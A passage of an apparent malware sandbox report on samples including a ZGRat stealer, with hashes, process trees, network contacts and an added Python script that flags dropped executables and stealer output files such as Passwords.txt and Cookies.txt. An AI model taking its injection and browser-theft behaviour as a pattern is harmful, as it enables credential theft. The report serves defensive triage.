memory/1148-5989-0x0000028263D40000-0x0000028263D50000-memory.dmp

memory/1148-6205-0x0000028263D40000-0x0000028263D50000-memory.dmp

memory/1148-6745-0x00007FF80EF30000-0x00007FF80F9F1000-memory.dmp

memory/2960-6746-0x0000000074BB0000-0x0000000075360000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nxryyws.exe

MD5 0b97baabefc29ff0dffd2ccaab0a208f
SHA1 aac9bed37cabfc6728ecd4d3d5e241c965071a0e
SHA256 ebf6065c587ef7db9230d9811d4cb4d2bb3e9f947036c7f3aae704e77137bb32
SHA512 71a5712b119249a583b59688bb2e461cb7b320fd1575ed3fc8c5ced95b75405b7dab2194035d2a511ae9a6529968711c599942077efc3bece6d5f6ec1f6a48d9

memory/2576-6751-0x00000000001F0000-0x000000000020C000-memory.dmp

memory/2576-6752-0x0000000074BB0000-0x0000000075360000-memory.dmp

memory/2576-6753-0x0000000004A70000-0x0000000004A80000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nxryyws.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
(These are the digests of a zero-byte file: this entry records nxryyws.exe as created, before its contents were written. They are not usable as indicators; the populated copies of the same path are listed separately with their own hashes.)

memory/2576-6754-0x0000000005580000-0x00000000056B6000-memory.dmp

memory/2576-7687-0x00000000056B0000-0x00000000056B1000-memory.dmp

memory/2576-7688-0x00000000058B0000-0x000000000597E000-memory.dmp

memory/2576-7689-0x0000000006160000-0x0000000006704000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nxryyws.exe.log

MD5 c3941d9fa38f1717d5cecd7a2ca71667
SHA1 33b5362675383b58b4166ed9f9a61e5aa6768d2e
SHA256 f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256
SHA512 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45

memory/3560-7694-0x0000000000400000-0x0000000000578000-memory.dmp

memory/3560-7697-0x0000000005830000-0x00000000058C2000-memory.dmp

memory/3560-7698-0x0000000005A80000-0x0000000005A90000-memory.dmp

memory/2576-7696-0x0000000074BB0000-0x0000000075360000-memory.dmp

memory/3560-7695-0x0000000074BB0000-0x0000000075360000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nxryyws.exe

MD5 20431b8ed3a072f81845a821249a01af
SHA1 6f15694b5fde1fdec4674928226f45499522f141
SHA256 56743a8bbb6d27acad0101d325b1a264156394dd11908da039f95209e5a0d388
SHA512 fa391aafbf5a81f868f1559e24ee040b5c0c7cf5be5e20669fdefbcc68daeae355899fe9723e245cd76d272ab0fce024896badc3002914264caf6ed031ece4fe

memory/3560-7699-0x0000000006770000-0x000000000677A000-memory.dmp

memory/3560-7700-0x0000000008FD0000-0x0000000009020000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Data\Cookies.txt

MD5 824ce7c07117a630e9b31638f89476aa
SHA1 2d012f1cd8b636de1662f69d213b3cf9fa5df846
SHA256 4d1a2351c6146b7f0cc87825160516933201af5e737028b360d4ee8d0ca7fdfd
SHA512 0c0d50920055b3a2343154acbe8e6d1a3490ce7ae403a21a9b385309805338ba05163500439ab85d30d1d2bb5c742009bb2b0c25d74533ba24780d31efe5c945

memory/3560-7741-0x0000000074BB0000-0x0000000075360000-memory.dmp

memory/3560-7740-0x0000000005A80000-0x0000000005A90000-memory.dmp
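The Files listings on this page mix three kinds of entry that a triage script should treat differently: memory regions dumped from a process (the `memory/PID-N-start-end` lines), dropped executables whose hashes change between entries because the same path was written more than once (loaderX.exe and nxryyws.exe both appear once as a zero-byte file and again with content), and the stealer's own output files under `Temp\Data\`. The following is an added example, not part of the report, that parses the listing in the report's own layout and flags those cases. The sample entries are copied from the two Files sections above; the flag names and the artefact-name list are this example's own, and the empty-file digests are computed rather than hard-coded so the check cannot drift.

```python
"""Parse a sandbox 'Files' listing and flag what matters (added example)."""
import hashlib
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Tuple

# Constructed sample: entries copied from the Files sections of this report.
SAMPLE_FILES = r"""memory/3764-945-0x0000000000400000-0x0000000000C0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\loaderX.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\loaderX.exe

MD5 6e0741d4586628386a6f1df47a03655e
SHA1 610950a24bb3c8b318130ffb98690ecba89c1018
SHA256 65a5758d31c44e29e26a3444333ed585e13117daed14bff83e33df06ad9133f7
SHA512 4a3e09b6f5c6a33a9c919477b488aef6d3bf18e793fa3ff82dd105015b95ba0cd4451e52fbcf5ff5c9e37bc138856aaa5d83a18529512fdc4794eaff9a401393

C:\Users\Admin\AppData\Local\Temp\build.exe

MD5 a90e4f6bdd44a71e2246160693884539
SHA1 940ebec474e0b4d87dc4f06f37a1d32d2315cf56
SHA256 b2c5ecae8bdeb480fb306372d7a12d943531bd0de1b15f45168ba659f25694d4
SHA512 9a7fcd588ef5842798481bacfb7b32dd57efe06db3c852c69916d0045f806894d475ccf8f52bed942a35f4160bb6c3be7d635b17928d29148318c2858b62d937

C:\Users\Admin\AppData\Local\Temp\Data\Passwords.txt

MD5 36f6acc2229073f5bb4074cee73d1d5b
SHA1 b2adbb44350d984dff40c15fcbbeb3379c7ec0e5
SHA256 8a947e0921f9cfada15c19a72f0ff31b38ad4602106c6ee95685d61c223c9a35
SHA512 da8b627bd674ceb0da7e30ba543ab82ab694d3f6e0474b48ca343ee74e20147440d2205b6ce66f5caa2a39061dedd2ca4146e263fac9f146a228c5b5cba4aaad
"""

HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
MEM_LINE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
# Digests of the empty input; a file hashed before it was written matches all of them.
EMPTY_DIGESTS = {a: getattr(hashlib, a.lower())(b"").hexdigest() for a in ("MD5", "SHA1", "SHA256", "SHA512")}
# Output file names seen under Temp\Data\ in this report (example's own list).
STEALER_ARTEFACTS = {"Passwords.txt", "CreditCards.txt", "Cookies.txt", "Autofills.txt", "Histories.txt", "Downloads.txt"}


class FileEntry(NamedTuple):
    path: str
    hashes: Dict[str, str]
    flags: List[str]


class MemoryRegion(NamedTuple):
    pid: int
    seq: int
    start: int
    end: int


def flag_entry(path: str, hashes: Dict[str, str]) -> List[str]:
    flags: List[str] = []
    if hashes and all(hashes[a] == EMPTY_DIGESTS[a] for a in hashes if a in EMPTY_DIGESTS):
        flags.append("zero_byte_capture")  # not an indicator: file recorded before content
    name = path.rsplit("\\", 1)[-1]
    if name in STEALER_ARTEFACTS:
        flags.append("stealer_artefact")
    if "\\Temp\\" in path and name.lower().endswith(".exe"):
        flags.append("dropped_executable")
    return flags


def parse_files(text: str) -> Tuple[List[FileEntry], List[MemoryRegion]]:
    """Walk the listing: a path line is followed by a blank and its hash lines."""
    files: List[FileEntry] = []
    regions: List[MemoryRegion] = []
    lines = [ln.rstrip() for ln in text.splitlines()]
    i = 0
    while i < len(lines):
        if not lines[i]:
            i += 1
            continue
        m = MEM_LINE.match(lines[i])
        if m:
            pid, seq, start, end = m.groups()
            regions.append(MemoryRegion(int(pid), int(seq), int(start, 16), int(end, 16)))
            i += 1
            continue
        path, hashes = lines[i], {}
        i += 1
        while i < len(lines) and (not lines[i] or HASH_LINE.match(lines[i])):
            hm = HASH_LINE.match(lines[i])
            if hm:
                hashes[hm.group(1)] = hm.group(2).lower()
            i += 1
        files.append(FileEntry(path, hashes, flag_entry(path, hashes)))
    return files, regions


def rewritten_paths(files: List[FileEntry]) -> Dict[str, List[str]]:
    """Paths that carry more than one distinct SHA256: rewritten during the run."""
    by_path: Dict[str, set] = defaultdict(set)
    for f in files:
        if "SHA256" in f.hashes:
            by_path[f.path].add(f.hashes["SHA256"])
    return {p: sorted(s) for p, s in by_path.items() if len(s) > 1}
```

Usage: `files, regions = parse_files(SAMPLE_FILES)` and then `rewritten_paths(files)`; the memory regions give the process and size of each dumped range (the PID 3764 region is 0x80A000 bytes, the mapped image of an unpacked payload), and only SHA256 values that are neither zero-byte captures nor superseded by a later write for the same path should go into a blocklist.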

Analysis: behavioral12

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231222-en

Max time kernel

0s

Max time network

147s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Pphucxdmff.dat

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Pphucxdmff.dat

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k UnistackSvcGroup

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
GB 96.17.179.70:80 tcp
US 8.8.8.8:53 70.179.17.96.in-addr.arpa udp
GB 96.17.179.68:80 tcp
GB 96.17.179.68:80 tcp
GB 96.17.179.83:80 tcp
US 8.8.8.8:53 udp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
US 8.8.8.8:53 90.16.208.104.in-addr.arpa udp
PL 93.184.221.240:80 tcp

Files

memory/4080-16-0x000002626A440000-0x000002626A450000-memory.dmp

memory/4080-36-0x00000262728E0000-0x00000262728E1000-memory.dmp

memory/4080-35-0x00000262727D0000-0x00000262727D1000-memory.dmp

memory/4080-34-0x00000262727D0000-0x00000262727D1000-memory.dmp

memory/4080-32-0x00000262727A0000-0x00000262727A1000-memory.dmp

memory/4080-0-0x000002626A340000-0x000002626A350000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

130s

Max time network

153s

Command Line

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Wjwxkhbvw.mp4"

Signatures

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\S: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\unregmp2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\unregmp2.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\unregmp2.exe N/A

Processes

C:\Program Files (x86)\Windows Media Player\wmplayer.exe

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Wjwxkhbvw.mp4"

C:\Windows\SysWOW64\unregmp2.exe

"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon

C:\Program Files (x86)\Windows Media Player\setup_wm.exe

"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Wjwxkhbvw.mp4"

C:\Windows\system32\unregmp2.exe

"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT

Network

Country Destination Domain Proto
US 138.91.171.81:80 tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 41.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 28.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 54.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 5.179.17.96.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\wmsetup.log

MD5 3feb7dde744972cacd8d20fb8e1e6e17
SHA1 e2edfb90cda9fe0977d007ab88a4524d34be321b
SHA256 c234ad4ac0971981297c69144e4b20511fe908d43943c252dfd7db780d2e194e
SHA512 3fa0a15376d5fdc383e353f7caf4595b276adcc8160e93e284751abd546a19ad067df0daf9095c2c7c7f9b5e1d459a740c76650d984005f51e8b62da22e49865

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

MD5 7050d5ae8acfbe560fa11073fef8185d
SHA1 5bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256 cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512 a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

MD5 e8e36b528974f6fac920c0bb58e47f37
SHA1 99c411cfc0f80d8be72717f04a276df466c87fd4
SHA256 23471c2bf7b3025197d55fdf0cd28304cc7083ebc5d853b7f3515a265161855c
SHA512 c0daf493dd6a5ad00094d10b7822f5e26c2dfcffdc72eb29c5b73f31d4ce5e7963c4e69a2d30e70edc72b4bf4425eebbc12844fa746b21b048f47ae60a2bce6f

Analysis: behavioral19

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:24

Platform

win10v2004-20231215-en

Max time kernel

138s

Max time network

166s

Command Line

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Wlkubkwdmop.mp4"

Signatures

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\T: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\unregmp2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\unregmp2.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\unregmp2.exe N/A

Processes

C:\Program Files (x86)\Windows Media Player\wmplayer.exe

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Wlkubkwdmop.mp4"

C:\Program Files (x86)\Windows Media Player\setup_wm.exe

"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Wlkubkwdmop.mp4"

C:\Windows\SysWOW64\unregmp2.exe

"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon

C:\Windows\system32\unregmp2.exe

"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT

Network

Country Destination Domain Proto
US 138.91.171.81:80 tcp
US 8.8.8.8:53 74.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 28.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 5.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 147.166.122.92.in-addr.arpa udp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\wmsetup.log

MD5 28602f97dddaf89e2964b64eb3da1e2c
SHA1 aecc3c7eb77847cb2da332dd52fc3fbe638ecc0a
SHA256 9ac1642d0a892ca08352f86e2af64b31d30cb9ec2d5878a79db9b5ca403f9f55
SHA512 16c93c944f18ac8a3172f542d1672d129ba09ce5386a21d8aadd177f46cc9761650c596905f6897b5cfdafa7c94f0a950ba2937a92df2d013a937b6e301f5b5a

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

MD5 7050d5ae8acfbe560fa11073fef8185d
SHA1 5bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256 cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512 a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

MD5 381fe4316fc3e55aa63d973eb0e3a051
SHA1 50ee6ce6fc1ad75e433902d6778f53a3d5d4f539
SHA256 de432c8dd36f22ca2adacc09067f14a1dc91a7740c2ca455c3b8ba69587cca43
SHA512 e2f5d37cbc43193465e024210e3823b342ac6b9e4ffad3789b37d5a77f7f4df0f5c66988d75109cbb87838fdcacabde38598ebb23cfb56d6b47cea6fac51784a

Analysis: behavioral6

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

141s

Max time network

157s

Command Line

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Evllmzg.wav"

Signatures

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\unregmp2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\unregmp2.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\unregmp2.exe N/A

Processes

C:\Program Files (x86)\Windows Media Player\wmplayer.exe

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Evllmzg.wav"

C:\Program Files (x86)\Windows Media Player\setup_wm.exe

"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Evllmzg.wav"

C:\Windows\SysWOW64\unregmp2.exe

"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon

C:\Windows\system32\unregmp2.exe

"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 18.179.17.96.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 wmploc.dll udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 28.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 31.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 29.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\wmsetup.log

MD5 4c5d72dd01816b33209d4344acd68b7a
SHA1 0c008710af3e0c8c40a9ca53179a6e4ea52af789
SHA256 28ae578bab0c7373335a84b701745d62693928cad75bf39c24f0c57d4f9fd94d
SHA512 7903dc52b64d25005ea4a7d37ebf96a0f1f40f8b349ebcf858db60aa0006176da65d66d71a5014b94c179e76c0cf54a2c650d36aaa15928c67ed5109daecd66d

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak

MD5 7050d5ae8acfbe560fa11073fef8185d
SHA1 5bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256 cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512 a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

MD5 fc240c081ec382df4b74d591d7d37a45
SHA1 396e9d8accb2ff8b32e6c3957808cb87d23ad47c
SHA256 8cfeb277627a0fc9f2596c83dc37f9a3d8871293cd88dadd08f32098bf936038
SHA512 d8f83773c330b88b43f9ebc6220aa98368854e44a75b73a8575e7171f6c32e784d404e5a2e2e7787d3c71c0cfecdbb983631b639d9fee879b374d498d2ef0ab7

Analysis: behavioral7

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

112s

Max time network

131s

Command Line

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Reads user/profile data of web browsers

spyware stealer

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2192 set thread context of 4360 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe N/A
